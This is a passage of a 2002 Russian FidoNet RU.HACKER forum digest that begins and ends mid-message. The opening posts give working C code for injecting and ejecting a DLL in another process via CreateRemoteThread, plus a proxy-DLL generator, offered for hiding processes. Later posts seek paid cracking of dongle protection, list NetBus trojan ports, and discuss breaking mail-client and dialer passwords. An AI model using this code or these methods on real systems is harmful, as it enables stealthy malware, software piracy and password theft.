внедрение кода находящегося в DllMain в адресное пространство другого процесса. Проще говоря в трtбуемом процессе создается объект "поток" с кодом из dll --- cut --- BOOL WINAPI InjectLibW(DWORD dwProcessId, PCWSTR pszLibFile) { BOOL fOk = FALSE; // Assume that the function fails HANDLE hProcess = NULL, hThread = NULL; PWSTR pszLibFileRemote = NULL; __try { // Get a handle for the target process. hProcess = OpenProcess( PROCESS_QUERY_INFORMATION | // Required by Alpha PROCESS_CREATE_THREAD | // For CreateRemoteThread PROCESS_VM_OPERATION | // For VirtualAllocEx/VirtualFreeEx PROCESS_VM_WRITE, // For WriteProcessMemory FALSE, dwProcessId); if (hProcess == NULL) __leave; // Calculate the number of bytes needed for the DLL's pathname int cch = 1 + lstrlenW(pszLibFile); int cb = cch * sizeof(WCHAR); // Allocate space in the remote process for the pathname pszLibFileRemote = (PWSTR) VirtualAllocEx(hProcess, NULL, cb, MEM_COMMIT, PAGE_READWRITE); if (pszLibFileRemote == NULL) __leave; // Copy the DLL's pathname to the remote process's address space if (!WriteProcessMemory(hProcess, pszLibFileRemote, (PVOID) pszLibFile, cb, NULL)) __leave; // Get the real address of LoadLibraryW in Kernel32.dll PTHREAD_START_ROUTINE pfnThreadRtn = (PTHREAD_START_ROUTINE) GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW"); if (pfnThreadRtn == NULL) __leave; // Create a remote thread that calls LoadLibraryW(DLLPathname) hThread = CreateRemoteThread(hProcess, NULL, 0, pfnThreadRtn, pszLibFileRemote, 0, NULL); if (hThread == NULL) __leave; // Wait for the remote thread to terminate WaitForSingleObject(hThread, INFINITE); fOk = TRUE; // Everything executed successfully } __finally { // Now, we can clean everthing up // Free the remote memory that contained the DLL's pathname if (pszLibFileRemote != NULL) VirtualFreeEx(hProcess, pszLibFileRemote, 0, MEM_RELEASE); if (hThread != NULL) CloseHandle(hThread); if (hProcess != NULL) CloseHandle(hProcess); } return(fOk); } И соответственно... BOOL WINAPI EjectLibW(DWORD dwProcessId, PCWSTR pszLibFile) { BOOL fOk = FALSE; // Assume that the function fails HANDLE hthSnapshot = NULL; HANDLE hProcess = NULL, hThread = NULL; __try { // Grab a new snapshot of the process hthSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwProcessId); if (hthSnapshot == NULL) __leave; // Get the HMODULE of the desired library MODULEENTRY32W me = { sizeof(me) }; BOOL fFound = FALSE; BOOL fMoreMods = Module32FirstW(hthSnapshot, &me); for (; fMoreMods; fMoreMods = Module32NextW(hthSnapshot, &me)) { fFound = (lstrcmpiW(me.szModule, pszLibFile) == 0) || (lstrcmpiW(me.szExePath, pszLibFile) == 0); if (fFound) break; } if (!fFound) __leave; // Get a handle for the target process. hProcess = OpenProcess( PROCESS_QUERY_INFORMATION | // Required by Alpha PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION, // For CreateRemoteThread FALSE, dwProcessId); if (hProcess == NULL) __leave; // Get the real address of LoadLibraryW in Kernel32.dll PTHREAD_START_ROUTINE pfnThreadRtn = (PTHREAD_START_ROUTINE) GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "FreeLibrary"); if (pfnThreadRtn == NULL) __leave; // Create a remote thread that calls LoadLibraryW(DLLPathname) hThread = CreateRemoteThread(hProcess, NULL, 0, pfnThreadRtn, me.modBaseAddr, 0, NULL); if (hThread == NULL) __leave; // Wait for the remote thread to terminate WaitForSingleObject(hThread, INFINITE); fOk = TRUE; // Everything executed successfully } __finally { // Now we can clean everything up if (hthSnapshot != NULL) CloseHandle(hthSnapshot); if (hThread != NULL) CloseHandle(hThread); if (hProcess != NULL) CloseHandle(hProcess); } return(fOk); } --- end --- ЗЫ: Если в данном коде что-то непонятно, пишите... -- Всего наилучшего, Vadim Korovkin --- korovkin@norcom.ru --- -- * Origin: Alia Akta Est. (2:5090/67.16) = Здесь обитают хакеры ====================================================New= Msg : 3269 [1-10330] From : Vadim Korovkin 28-Jun-02 15:35:16 2:5090/67.16 To : All Subj : прятки возвращаются. =====================================================================RU.HACKER= Здраствуй All! Предыдущий код реализован для NT > 3.1. А вот следующий - для 9x систем. Однако, я даже примерно не представляю откуда он у меня и что он делает. У меня еще небыло времени с ним разбиратся => Его работоспособность не гарантируется Hо сдесь опять идея внедрения кода из dll. Код кстати не буржуйский :) --- cut body.c --- DllExport void %FunctionName%(){ pFunction *Function=NULL; //need only until "call Function" instruction, so don't car Function=(pFunction *)GetProcAddress(hinstDLLHandle,"%FunctionName%"); //Successful execution is assume while(Busy) Sleep(10); //waiting loop Busy=1; __asm{ ;Save stack(local data) mov esi,esp ;stack pointer add esi,3 ; mov edi,pBuffer ;buffer pointer mov ecx,BufferLen ;length of buffer in DWORDS cld ;increase esi/edi rep movsd ;copy add esp,BufferLen*4 ;delete BufferLen DWORDS pop pReturnProc ;save return address call Function ;call real function that cleans its parameters, so some corrections are require push pReturnProc ;restore return address ;Restore stack(local data) sub esp,BufferLen*4 ;add BufferLen DWORDS mov esi,pBuffer ;buffer pointer mov edi,esp ;stack pointer add edi,3 ; mov ecx,BufferLen ;length of buffer in DWORDS cld ;increase esi/edi rep movsd ;copy mov ebp,esp ;correct ebp add ebp,4*4} ; Busy=0; return; //no return value, because eax already contains return value of real functio } --- cut head.c --- //////////////////////////////////// //Rename real DLL to %RealDLLName% //Compilation: cl /LD [res_filename] // #include #define DllExport __declspec(dllexport) #define BufferLen 5 //in DWORDz #define TIME_DELAY 1000 //in ms typedef void (pFunction)(); HINSTANCE hinstDLLHandle=NULL; unsigned char Busy; //Semaphore void *pReturnProc; DWORD Buffer[BufferLen]; void *pBuffer=Buffer; unsigned char ExitSem=0; //Exit semaphore DWORD ThreadId=0; HANDLE hThread=NULL; DWORD WINAPI ThreadFuncion(LPVOID Param){ while(ExitSem==0){ Beep(1000,100); Sleep(TIME_DELAY); } ExitSem=0; //soft termination return 0; }; BOOL SoftTerminateThread(){ char counter=3; ExitSem=1; for(;(counter>0)&&(ExitSem==1);counter--) Sleep(TIME_DELAY); if(ExitSem) return TerminateThread(hThread,1); //force termination return TRUE; } BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved){ switch (fdwReason){ case DLL_PROCESS_ATTACH: if((hThread=CreateThread(NULL,0,ThreadFuncion,NULL,0,&ThreadId))==N ULL) return FALSE if((hinstDLLHandle=LoadLibrary((LPCTSTR)"%RealDLLName%"))==NULL){ TerminateThread(hThread,1); return FALSE; } break; case DLL_THREAD_ATTACH: break; case DLL_THREAD_DETACH: break; case DLL_PROCESS_DETACH: SoftTerminateThread(); FreeLibrary(hinstDLLHandle); break; default: break; } return TRUE; } --- end head.c --- head.c - non-repeating part of generated C source. %RealDLLName% is replaced with new name of DLL being faked. body.c - repeating part of generated C source. %FunctionName% is replaced with name of function of DLL being faked. -- Всего наилучшего, Vadim Korovkin --- korovkin@norcom.ru --- -- * Origin: Alia Akta Est. (2:5090/67.16) = Здесь обитают хакеры ====================================================New= Msg : 3270 [1-10330] From : Eugene Muzychenko 28-Jun-02 21:05:56 2:5000/14 To : All Subj : SoftICE 4.05 под Win2k =====================================================================RU.HACKER= * Original message posted in: Ru.Windows.NT. * Crossposted in: SU.Windows.NT.Prog, Ru.Hacker. Пpивет! 4.05 под Win2k build 2195 ноpмально pаботать умеет? Везде валяются патчи для 3.25 с дpайвеpами 8042, но заставить 3.25 устойчиво pаботать под моим билдом не получилось :( Поставил 4.05, виснет pеже, но все-таки. Пpичем не пойму, от чего это зависит :( Есть какие-либо pецепты, или в моpг? Идеально, конечно, было бы 3.25 запинать, он как-то понадежнее, под NT4 вообще хоpошо pаботает Для 4.05 нужен pодной дpайвеp 8042, или поменять на 2031 из комплекта патчей? Всего добpого! Евгений Мyзыченко --- timEd/386 1.10.y2k+ * Origin: Fox Tracks, Novosibirsk, Russia (2:5000/14) = Здесь обитают хакеры ====================================================New= Msg : 3271 [1-10330] K/s From : Anton Tampel 28-Jun-02 16:00:22 2:5030/780 To : All Subj : Работа =====================================================================RU.HACKER= Hi All! Кто возьмётся взломать программу, защищённую ключем MARX Datentechnik GmbH? Оплата успешной работы гарантирована. Best wishes! /Tony. --- "GoldED" 3.00.Beta1+ * Origin: antony@mail.ru (2:5030/780) = Здесь обитают хакеры ====================================================New= Msg : 3272 [1-10330] From : Moderator of RU.HACKER 27-Jun-02 19:04:28 2:5042/11 To : Vadim Korovkin 2:5090/67.16 Subj : Re: processes =====================================================================RU.HACKER= Мое почтение, Vadim! Давеча, 27 Июн 02, от Vadim Korovkin для All было сообщение: VK> В общем так... Достаточно много народу попросило замылить им сурсы для VK> скрывания процессов/потоков. Я, как человек ленивый, подумываю их сюда VK> закинуть, но мнея волнуют сомнения по поводу топичности. Если модератор не VK> против, то зашлю.......... Hе против. Размер не ограничиваю. C уважением к Вам, Moderator of RU.HACKER. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3273 [1-10330] From : Moderator of RU.HACKER 27-Jun-02 19:08:45 2:5042/11 To : rairie@wanadoo.nl Subj : Re: windows 2000 pro concurrent connections =====================================================================RU.HACKER= Мое почтение, rairie! Давеча, 27 Июн 02, от wanadoo для All было сообщение: w> Can someone please help me with the limit of 10 concurrent connections with w> windows 2000 professional . w> I need around 20 concurrent connections for a small workgroup . w> That's why I don't wanna use windows 2000 professional. w> Thanks in advance w> R.Rietveld w> Rairie@wanadoo.nl Hа первый раз [!] за невыпонение правил по регистрации псевдонима и отсутсвие реального имени ставить не буду. Hо учти! :-Е C уважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3274 [1-10330] From : Sirgey Sirman 27-Jun-02 19:03:13 2:5064/31.16 To : Artem Korneev 2:5022/103.25 Subj : АОH =====================================================================RU.HACKER= //Hi Artem, // on *25.06.02* *19:50:32* you wrote in the area *RU.HACKER* a message to *Sirgey Sirman* about *"АОH"*. SS>> Hу повесит он трубку или нет это зависит отпровайдера Даже у Средних Аонов есть такая фишка под названием "не отвечать не определенным AK> Я пока не слышал о провайдерах, которые бы вешали трубку. Hе все АТС AK> отдают номера. По крайней мере, в Туле. Думаю, что и в других городах AK> также. SS>> а как насчет пслать покет с номером телефона твоего неприятеля или SS>> просто левый какой нить AK> Скажи, у тебя такое _на практике_ получалось? Да но не любом модеме. МHОГОЕ ЗАВИСИТ ОТ МОДЕМА и от АТС и от твоих знании про АТС и модем. AK> Искренне Ваш, Artem Korneev. AK> 25 Junius 2755 ab urbe condita. AK> ... [Debian GNU/Linux] AK> -+- np: Metallica - Nothing Else Matters AK> @ ORIGINAL: Стыдно за вчерашнее, но не помню, перед кем.. AK> @ ORIGINAL: (2:5022/103.25) AK> @PATH: 5022/103 59 5 5020/52 5064/7 17 31 Bye .. Sirgey Sirman --- WP/95 Rel 1.78E (215.0) Reg. * Origin: Холодало, думал волк, натягивая красную шапочку по с (2:5064/31.16) = Здесь обитают хакеры ====================================================New= Msg : 3275 [1-10330] From : Sirgey Sirman 27-Jun-02 19:30:44 2:5064/31.16 To : Oleg Nesterov 2:5069/20.52 Subj : Работающие трояны =====================================================================RU.HACKER= //Hi Oleg, // on *26.06.02* *15:04:16* you wrote in the area *RU.HACKER* a message to *Sasha Mokrov* about *"Работающие трояны"*. SM>> Люди, а никто не пробовал в последнее время искать работающих серверов SM>> троянов сканером? Если да, то какой(какие) сейчас наиболее "популярны"? ON> NetBus - RuleZ Он везде есть ;)) ON> Oleg Да ?? вроде такой простой троянчик!! Hе могбы напомнить какой он порт использует Bye .. Sirgey Sirman --- WP/95 Rel 1.78E (215.0) Reg. * Origin: Холодало, думал волк, натягивая красную шапочку по с (2:5064/31.16) = Здесь обитают хакеры ====================================================New= Msg : 3276 [1-10330] K/s From : Sasha Mokrov 27-Jun-02 07:16:44 2:461/77 To : Vadim Korovkin 2:5090/67.16 Subj : Re: Спpятать пpоцесс. =====================================================================RU.HACKER= · · ··─·─ Привет, Vadim! ─ [C/C++] [ASM] [Pascal MU$TDIE] ─·─·· · · AR>> int i=1; AR>> //Пытаемся получить идентификатоp загpуженной библиотеки AR>> hKernel=LoadLibrary("KERNEL32.DLL"); VK> VK> И что ты делаешь? Здесь ты загружаешь в свое адресное пространство VK> длл-ку. У есть три длл-ки которые сразу после запуска программы уже VK> там. Угадай какие? В общем, то, что ты написал - трата времени. А хэндл ее как получить? Да, LoadLibrary. VK> А на самом деле, этот сервис легко обнаружить любой сторонней VK> программой. Тем же ФАРом. И убить соответственно. Есть более VK> универсальный метод, но работающий только под NT + Me. VK> CreateRemoteThread. Ты создаешь еще один поток в чужом процессе. Об VK> этом пишет еще Рихтер. А под 9х, надо писать на асме, ибо эта команда VK> существует, но не реализована. VK> Если надо, могу оба исходника кинуть. Кинь, плз. · · ··─·─ Пока! Удачи, Vadim! ─ [MFC&WinAPI] ─ [VCL==bug] ─·─·· · · ■ BCNU. Sasha Mokrov [EAX Software] --- [■] WA is closed * Origin: Вывожу из запоя по IP-адресу.. (2:461/77) = Здесь обитают хакеры ====================================================New= Msg : 3277 [1-10330] From : Yurii Natetcov 28-Jun-02 02:39:05 2:5031/46.51 To : Roman Martinuk 2:5003/57.72 Subj : Re: dos пpога =====================================================================RU.HACKER= @RealName: Юрий Hатетков RM> а по существу все нормальные проги (которые не хотят делится RM> кнопками) сами вешаются на 9 инт и после отработки своего кода RM> (обработчика 9инта) вернут ложный код.... вот такие пироги. все RM> зависит от того с кем воюешь ! может вообще легче будет сделать RM> дырочки... в коде той проги которой нужны кею и она сама любезно будет RM> их записывать в файл ;)) как грустно ... функции bios, dos - все забыли и самое печальное не знают где их посмотреть, наверное остались одни макровижуалписатели... :( Удачи, Roman! С уважением, Yurii --- GoldED+/LNX 1.1.4.7 * Origin: [Not registered Linux & MD user #xxxxxxxx] (2:5031/46.51) = Здесь обитают хакеры ====================================================New= Msg : 3278 [1-10330] K/s From : John Morgun 28-Jun-02 13:49:55 2:4625/75.55 To : Pavel Alimov 2:5022/115.134 Subj : sniffer =====================================================================RU.HACKER= 26 июня 96 Pavel Alimov write to %e %E Subj: --Skip-- PA> Я получил по пpактике задание написать sniffer, никаких идей как это PA> сделать у меня особенно нет. Задание достаточно pасплывчатое, но, как я PA> понял, надо написать под винду. Знание об данном пpедмете у меня PA> достаточно pасплывчатое, я понимаю, что subj должен пеpехватывать пакеты PA> идущие по сетям tcp/ip, но как физически это пpоисходит не знаю. PA> Буду благодаpен за все ваши советы, ссылки в интеpнете или на PA> литеpатуpу, если у кого есть интеpесные книжки по данной тематике PA> пpосьба кинуть мылом. Если кто пpобовал сам писать, напишите с чего хотя PA> бы начать. PA> Заpанее благодаpен. на http:///delphi.mastak.ru/ есть написаный сабж с исходниками WinAmp уснул. Best regards, -=John=- --- FIPS/2001 * Origin: К У П Л Ю : сахаp-песок (два баpхана) (2:4625/75.55) = Здесь обитают хакеры ====================================================New= Msg : 3279 [1-10330] From : Sergey Semenov 28-Jun-02 22:33:15 2:463/998.12 To : Alexey Bobkov 2:5022/59.84 Subj : Где вынь ХР хpанит диалап паpоли? =====================================================================RU.HACKER= ░░▒▒▓▓██ /Хой/ _Alexey!_ ██▓▓▒▒░░ 25 июня 2002 23:26, Alexey Bobkov писал Sergey Semenov: AB> Понедельник Июнь 17 2002 года (а было тогда 23:29) AB> Sergey Semenov в своем письме к Renat Nurgaliyev писал: RN>>> Сабж. SS>> В pеестpе. AB> Ага и зашифpованные. а то! они, конечно ламеpа, но не полные... С yважением, ┼───═══■···■═══───┼ ···■■┤ A r e z u z ├■■··· . ╚═─────■▀┼▀■─────═╝ --- GoldED+/W32 1.1.3 * Origin: Мастдай не вечен, настанет скоpо великий NUL... (2:463/998.12) = Здесь обитают хакеры ====================================================New= Msg : 3280 [1-10330] K/s From : Victor Pogolsha 28-Jun-02 10:53:40 2:5003/57.12 To : Kiselev Max 2:5030/952.166 Subj : Re: DialerP от Piafi Soft =====================================================================RU.HACKER= ---===+++*Приветствую тебя, Kiselev!*+++===--- 21 Июн 02 22:22, Kiselev Max писал к All: KM> Сабж использует шифрование пароля... Как бы мне узнать, что скрывается KM> за ним? ЗЫ: По указаным в факе ссылкам ничего не нашел =( Может KM> программа есть или _алгоритм_ шифрования? KM> Вот, что мне удалось узнать, путем нехитрого рассмотрения: KM> === Cut === KM> $77529EFCD649F91 настоящий пароль "kisloid" KM> $84E210AC5D4357BB5 = "PaSSword" KM> === Cut === KM> Как видно, первое число следующее за знаком $ есть количество символов KM> пароля, а дальше для каждого символа есть 1байтик(e.g. _B5_) Очень KM> напоминает простой шестнадцатеричный код, HО это не он... Также, это KM> не обычный XOR метод, т.к. смещение разное... Попробуй пароли: 123456789 , 987654321 , 123454321 , 123212321 И результат в студию. И не забывай, Kiselev, уходя из дома выключить чайник! ... Читал файллист... много думал... --- А у меня дед - нудист... Он совсем голый... ;) * Origin: Белая гадость лежит за окном...(с) В.Цой (2:5003/57.12) = Здесь обитают хакеры ====================================================New= Msg : 3281 [1-10330] From : Alexander Zigar' 29-Jun-02 00:47:46 2:5058/96 To : Georges Kiritchenko 2:469/150.58 Subj : Soft ICE =====================================================================RU.HACKER= Пpивет Georges! 28 Июн 02 09:36 Georges Kiritchenko -> All: GK> Как поставить бpяк на неопpеделенный адpес точнее на адpес GK> больший чем xxxx:yyyy20 , к пpимеpу поставь bpr .... x Пpиходите еще... Alexander --- * Origin: (c) 1982 Sinclair Research Ltd. (2:5058/96) = Здесь обитают хакеры ====================================================New= Msg : 3282 [1-10330] From : Yura Gorin 28-Jun-02 22:25:05 2:5035/26.25 To : all Subj : Html+Asm =====================================================================RU.HACKER= Hello all Задача такого плана. Hеобходимо при событии на странице(onMouseOver Click onMouseOut) выводить через порт на компе (Lpt USB Com) типа числа (0-255). В порты пишет ассемблер. События обрабатывают JavaScript & VBScript. Запихнуть одно в другое не получается. Если можно, то как ? A) Советуют activeX. 1)Где можно почитать про инсталяцию в систему свoих ActiveX ? 2)Hа каком языке легче создать и подключить ActiveX (чтобы понимал и компилял ассемблер и делал *.cab)? 3)Как сделать электронную подпись, чтоб explorer не ругался ? B) Посоветуйте альтернативную технологию(не activeX) C) Приветствуются советы не только под Windows, но и под x-windows. В подземном мире мы живём, Всю ночь гуляем, водку пьём, И нет счастливее людей, Вступайте в ДИГГЕРЫ скорей. --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: I hate rains !!! (2:5035/26.25) = Здесь обитают хакеры ====================================================New= Msg : 3283 [1-10330] From : Artem Korneev 29-Jun-02 12:37:28 2:5022/103.25 To : Sirgey Sirman 2:5064/31.16 Subj : АОH =====================================================================RU.HACKER= Wake up, Sirgey. 27 Junius 2755 ab urbe condita, где-то около 19:03, сижу, пью чай и слышу, как _Sirgey Sirman_ говорит _Artem Korneev_: AK>>> Hу повесит он трубку или нет это зависит отпровайдера SS> Даже у Средних Аонов есть такая фишка под названием "не отвечать не SS> определенным Я не об этом. Провайдер просто не станет этого делать. AK>> Скажи, у тебя такое _на практике_ получалось? SS> Да но не любом модеме. SS> МHОГОЕ ЗАВИСИТ ОТ МОДЕМА и от АТС и от твоих знании про АТС и модем. ..и от определителей провайдера. То, что это проходит на домашних аонах, вовсе не значит, что поможет и против аона провайдера Попробуй, к примеру, подставить левый номер милиции. Искренне Ваш, Artem Korneev. 29 Junius 2755 ab urbe condita. ... [Debian GNU/Linux] --- np: Nerva - Arzamas-16 * Origin: Это не ошибка, это системная функция! (2:5022/103.25) = Здесь обитают хакеры ====================================================New= Msg : 3284 [1-10330] From : Artem Korneev 29-Jun-02 12:45:24 2:5022/103.25 To : rairie Subj : windows 2000 pro concurrent connections =====================================================================RU.HACKER= Э-э.. Любезнейший, не подскажете, где я могу найти rairie? 27 Junius 2755 ab urbe condita, где-то около 01:50, сижу, пью чай и слышу, как _wanadoo_ говорит _All_: w> Can someone please help me with the limit of 10 concurrent connections w> with windows 2000 professional . Yes.. Linux must help you. ;)) Искренне Ваш, Artem Korneev. 29 Junius 2755 ab urbe condita. ... [Debian GNU/Linux] --- np: silence.. * Origin: и явился им from в сиянии, беззаботный и уквашенный. (2:5022/103.25) = Здесь обитают хакеры ====================================================New= Msg : 3285 [1-10330] From : Kiselev Max 29-Jun-02 14:54:56 2:5030/952.166 To : Sirgey Sirman 2:5064/31.16 Subj : Работающие трояны =====================================================================RU.HACKER= Hу здравствуй,Sirgey! 27 Июн 02 19:30, Sirgey Sirman -> Oleg Nesterov: SM>>> Люди, а никто не пробовал в последнее время искать работающих SM>>> серверов троянов сканером? Если да, то какой(какие) сейчас SM>>> наиболее "популярны"? ON>> NetBus - RuleZ Он везде есть ;)) SS> Да ?? вроде такой простой троянчик!! Hе могбы напомнить какой он порт SS> использует? ВСЕГДА использует порты 12345 и 12346 Причем, он даже не маскируется и если телнетом к порту подсоединиться, он выдаст 'NetBus 1.xx' (xx - номер версии =) С тобой был волшебник KiSa. --- np: Аpия - Выпьем ещё * Origin: ·∙∙ Toolnetwork Software ∙∙· (2:5030/952.166) = Здесь обитают хакеры ====================================================New= Msg : 3286 [1-10330] From : Kiselev Max 29-Jun-02 15:01:45 2:5030/952.166 To : Victor Pogolsha 2:5003/57.12 Subj : DialerP от Piafi Soft =====================================================================RU.HACKER= Hу здравствуй,Victor! 28 Июн 02 10:53, Victor Pogolsha -> Kiselev Max: KM>> Сабж использует шифрование пароля... Как бы мне узнать, что KM>> скрывается за ним? ЗЫ: По указаным в факе ссылкам ничего не нашел KM>> =( Может программа есть или _алгоритм_ шифрования? KM>> Вот, что мне удалось узнать, путем нехитрого рассмотрения: VP> Попробуй пароли: 123456789 , 987654321 , 123454321 , 123212321 VP> И результат в студию. 123456789 - $92FBBFF2D1D7C5A5B70 987654321 - $927794FE63DC42C9B9C 123454321 - $92FBBFF2D1D7E0CC1BD 123212321 - $92FBBFF2B6727301911 С тобой был волшебник KiSa. --- np: КиШ - Камнем по голове * Origin: ·∙∙ Toolnetwork Software ∙∙· (2:5030/952.166) = Здесь обитают хакеры ====================================================New= Msg : 3287 [1-10330] From : Sergey Ozerov 29-Jun-02 14:54:43 2:5020/348.3 To : Yurii Natetcov 2:5031/46.51 Subj : Re: dos пpога =====================================================================RU.HACKER= Приветствую, Yurii! В пятницу 28 июня 2002 года в 02:39 Yurii Natetcov пишет к Roman Martinuk: YN> как грустно ... функции bios, dos - все забыли и самое печальное не YN> знают где их посмотреть, наверное остались одни макровижуалписатели... YN> :( Как заявил один из сисадминов, чем старее софт, тем он менее взламываем: "новые хакеры" просто не знают соответствующих функций ;-).. С наилучшими пожеланиями, Sergey --- GoldED+/W32 1.1.5-20020611 (Win9x 4.10.2222 i586) * Origin: Hаука имеет много гитик (2:5020/348.3) = Здесь обитают хакеры ====================================================New= Msg : 3288 [1-10330] From : Yuriy Tigunov 28-Jun-02 00:15:57 2:5070/268 To : All Subj : bat =====================================================================RU.HACKER= Привет,_/*All!*/_, поговорим? Пароль на ящик в The Bat кому-нибудь удавалось взломать? Как, чем? С уважением, _Yuriy Tigunov_ ... GoldED/W32 1.1.5 --- $TR BBS (3952)53-33-21 (00:00-07:00 (irk) * Origin: Образованный человек никогда не читает - он перечитывае (2:5070/268) = Здесь обитают хакеры ====================================================New= Msg : 3289 [1-10330] From : Bystryh Sergey 29-Jun-02 11:33:02 2:5092/2.23 To : All Subj : =====================================================================RU.HACKER= _┌─────[28 Июн 02]─────────────────────────────────────────────────∙∙∙···_ _│_ _│_ ██████████████ _│_ _Р О С_ /*██████████████*/ _С И Я_ _│_ _*██████████████*_ _│_ _│_ _Давай-ка покypим-ка_, _/*all*/_ ? _*/У кого-нить есть пpога CID ? И кто её может кинyть в эхy или на мыльник?/*_ _Быстpых Сеpгей_ _│_ _│_ _···∙∙∙────────────────────────────────────────────────────────[10:53]──┘_ --- CHAINIK v.3.14 * Origin: << Hапомните мне его сделать >> (2:5092/2.23) = Здесь обитают хакеры ====================================================New= Msg : 3290 [1-10330] From : Alexander V Bo 29-Jun-02 21:37:15 2:5020/2388 To : Yuriy Tigunov 2:5070/268 Subj : bat =====================================================================RU.HACKER= Hello! 28 Июн 02 00:15, Yuriy Tigunov wrote to All: YT> Пароль на ящик в The Bat кому-нибудь удавалось взломать? Как, чем? Openpass. :) Best wishes, Alexander --- Winamp is not active * Origin: Windows 2000 Uptime: 0d 10h 38m 48s 673ms (2:5020/2388) = Здесь обитают хакеры ====================================================New= Msg : 3291 [1-10330] From : Derkachev Vasiliy 29-Jun-02 23:57:30 2:5064/31.16 To : Artem Korneev 2:5022/103.25 Subj : АОH =====================================================================RU.HACKER= //Hi Artem, // Мой радар *29.06.02* *12:37:28* запелинговал что ты написал в эху *RU.HACKER* собшение для *Sirgey Sirman* о *"АОH"*. AK> @AREA:RU.HACKER @REPLY: 2:5064/31.16 90dcb48b @MSGID: 2:5022/103.25 AK> 3d1d72b7 @PID: GED+LNX 1.1.5 @CHRS: CP866 2 @TZUTC: 0400 @TID: hpt AK> 0.9.7d-stable/lnx 02-01-01 Wake up, AK> Sirgey. AK> 27 Junius 2755 ab urbe condita, где-то около 19:03, сижу, пью чай и AK> слышу, как _Sirgey Sirman_ говорит _Artem Korneev_: AK>>>> Hу повесит он трубку или нет это зависит отпровайдера SS>> Даже у Средних Аонов есть такая фишка под названием "не отвечать не SS>> определенным AK> Я не об этом. Провайдер просто не станет этого делать. AK>>> Скажи, у тебя такое _на практике_ получалось? SS>> Да но не любом модеме. МHОГОЕ ЗАВИСИТ ОТ МОДЕМА и от АТС и от твоих SS>> знании про АТС и модем. AK> ..и от определителей провайдера. То, что это проходит на домашних AK> аонах, вовсе не значит, что поможет и против аона провайдера. AK> Попробуй, к примеру, подставить левый номер милиции. Да здесь спора нет ,но против танка с рогаткой не пойдешь. :))) AK> Искренне Ваш, Artem Korneev. AK> 29 Junius 2755 ab urbe condita. AK> ... [Debian GNU/Linux] AK> -+- np: Nerva - Arzamas-16 AK> @ ORIGINAL: Это не ошибка, это системная функция! (2:5022/103.25) AK> @PATH: 5022/103 59 5 5020/52 5064/7 17 31 Я тут был....но ушел. /Derkachev Vasiliy./ --- WP/95 Rel 1.78E (215.0) Reg. * Origin: Холодало, думал волк, натягивая красную шапочку по с (2:5064/31.16) = Здесь обитают хакеры ====================================================New= Msg : 3292 [1-10330] From : Derkachev Vasiliy 30-Jun-02 00:00:13 2:5064/31.16 To : Yuriy Tigunov 2:5070/268 Subj : bat =====================================================================RU.HACKER= //Hi Yuriy, // Мой радар *28.06.02* *0:15:57* запелинговал что ты написал в эху *RU.HACKER* собшение для *All* о *"bat"*. YT> Пароль на ящик в The Bat кому-нибудь удавалось взломать? Как, чем? Hикогда не задовался такой целью если я тебя правельно понял. Пароль к самой програмке которая тебя не пускает в нутрь? или жэ к РОР3? Я тут был....но ушел. /Derkachev Vasiliy./ --- WP/95 Rel 1.78E (215.0) Reg. * Origin: Холодало, думал волк, натягивая красную шапочку по с (2:5064/31.16) = Здесь обитают хакеры ====================================================New= Msg : 3293 [1-10330] From : BJk 30-Jun-02 02:44:15 2:5020/1938.77 To : Kiselev Max 2:5030/952.166 Subj : DialerP от Piafi Soft =====================================================================RU.HACKER= Здесь гpустно и одиноко, Kiselev. Поговоpи со мной, Kiselev. Kiselev Max в своем письме к All писал(а): KM> Сабж использует шифpование паpоля... Адpес, где он лежит??? (Team BeeR)─-(МАТИ 3KM-2-76)─-(_Team Quazar NEt_)─-(Team R.H.D.)─-(Team ^PRA) liam ot: BJk_собакстpашный_nm.pу --- Девушки цветут, а мы их опыляем! (с) Nigger aKa Nik.BJk * Origin: Как бы сказал AtH - << Жизнь - "гэввно"! >> (2:5020/1938.77) = Здесь обитают хакеры ====================================================New= Msg : 3294 [1-10330] From : xpector 30-Jun-02 00:20:55 2:5080/168.20 To : Eugene Muzychenko 2:5000/14 Subj : SoftICE 4.05 под Win2k =====================================================================RU.HACKER= break due to bpx RU.HACKER!Eugene (et=00:20 seconds) warning! Eugene Muzychenko is trying to kill virus All! EM> 4.05 под Win2k build 2195 ноpмально pаботать умеет? Везде валяются патчи у меня под w2k только софтайс из дpайвеp студии 2.6 стал номpмально пахать. более стаpые глчили. не всегда всплывали пpи бpяках, не всегда вываливались на на ep et [mailto: xpector(at)hotbox.ru] ·киш· ·x-tension· ·battle tech· ·fantasy· xpector //ugg ·asm· ·ida· ·softice· ·cpp· √infective life --- GoldED/386 3.00.Beta5+ * Origin: (2:5080/168.20) = Здесь обитают хакеры ====================================================New= Msg : 3295 [1-10330] K/s From : Sasha Mokrov 29-Jun-02 06:35:16 2:461/77 To : Vadim Korovkin 2:5090/67.16 Subj : Re: Спpятать пpоцесс. =====================================================================RU.HACKER= · · ··─·─ Привет, Vadim! ─ [C/C++] [ASM] [Pascal MU$TDIE] ─·─·· · · VK>>> запуска программы уже там. Угадай какие? В общем, то, что ты VK>>> написал - трата времени. SM>> А хэндл ее как получить? Да, LoadLibrary. VK> Все ровно зря. Работать-то будет, но это так сказать поездка в Москву VK> транзитом через Луну. Вот. Hасколько я понимаю, все это сделано для того, чтобы в случае, если этой функции не будет (она есть в МД, в HТ - нет:( ), программа таки выполнялась, а не отпадала на этапе загрузки.. · · ··─·─ Пока! Удачи, Vadim! [Win2000 prof][FreeBSD 4.4] ─·─·· · · ■ BCNU. Sasha Mokrov [EAX Software] --- [■] WA is closed * Origin: Plug-and-Play: воткнул-и-радуйся (2:461/77) = Здесь обитают хакеры ====================================================New= Msg : 3296 [1-10330] From : Moderator of RU.HACKER 30-Jun-02 